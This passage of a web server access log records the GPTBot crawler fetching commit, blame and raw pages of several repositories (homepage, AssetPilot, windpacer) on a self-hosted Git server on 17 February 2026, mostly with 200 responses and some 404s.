12.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" -[17/Feb/2026:13:50:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" [Client 74.7.227.38] [Length 21975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" -[17/Feb/2026:13:50:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:13:50:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 9949] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:13:50:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:13:50:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 9943] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:13:50:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2fstatic" [Client 74.7.227.38] [Length 96584] [Gzip 11.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static" -[17/Feb/2026:13:50:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 10163] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log" -[17/Feb/2026:13:50:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9951] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:13:50:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 10152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host" -[17/Feb/2026:13:50:21 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/assets/js/script.js" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" -[17/Feb/2026:13:50:22 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" -[17/Feb/2026:13:50:22 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/assets/js/script.js" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" -[17/Feb/2026:13:50:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:13:50:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 9938] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log" -[17/Feb/2026:13:50:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app" [Client 74.7.227.38] [Length 10475] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" -[17/Feb/2026:13:50:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 11520] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" -[17/Feb/2026:13:50:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app" [Client 74.7.227.38] [Length 10498] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" -[17/Feb/2026:13:50:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv" [Client 74.7.227.38] [Length 11487] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" -[17/Feb/2026:13:50:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html?display=rendered" [Client 74.7.227.38] [Length 14354] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:50:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" [Client 74.7.227.38] [Length 12798] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" -[17/Feb/2026:13:50:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" [Client 74.7.227.38] [Length 10124] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" -[17/Feb/2026:13:50:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" [Client 74.7.227.38] [Length 84442] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" -[17/Feb/2026:13:50:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor" [Client 74.7.227.38] [Length 12274] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:50:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest" [Client 74.7.227.38] [Length 9898] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest" -[17/Feb/2026:13:50:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:13:50:30 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:13:50:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 11037] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv" -[17/Feb/2026:13:50:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 11526] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv" -[17/Feb/2026:13:50:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 11008] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv" -[17/Feb/2026:13:50:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 16638] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app" -[17/Feb/2026:13:50:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" -[17/Feb/2026:13:50:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 12239] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" -[17/Feb/2026:13:50:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10978] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" -[17/Feb/2026:13:50:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10865] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" -[17/Feb/2026:13:50:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libwinpthread-1.dll" [Client 74.7.227.38] [Length 10857] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" -[17/Feb/2026:13:50:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 10855] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" -[17/Feb/2026:13:50:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 10848] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" -[17/Feb/2026:13:50:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 10852] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" -[17/Feb/2026:13:50:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 16191] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" -[17/Feb/2026:13:50:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 11160] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" -[17/Feb/2026:13:50:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 12106] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" -[17/Feb/2026:13:50:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist" [Client 74.7.227.38] [Length 10131] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/dist" -[17/Feb/2026:13:50:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 11781] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:50:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build" [Client 74.7.227.38] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:50:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 711] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:50:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 10199] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:50:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10411] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:50:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 10427] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:50:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9904] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/PostgresWatchdog.exe" -[17/Feb/2026:13:50:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 10408] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:50:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 10184] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:13:50:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 9912] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/BuildTip.txt" 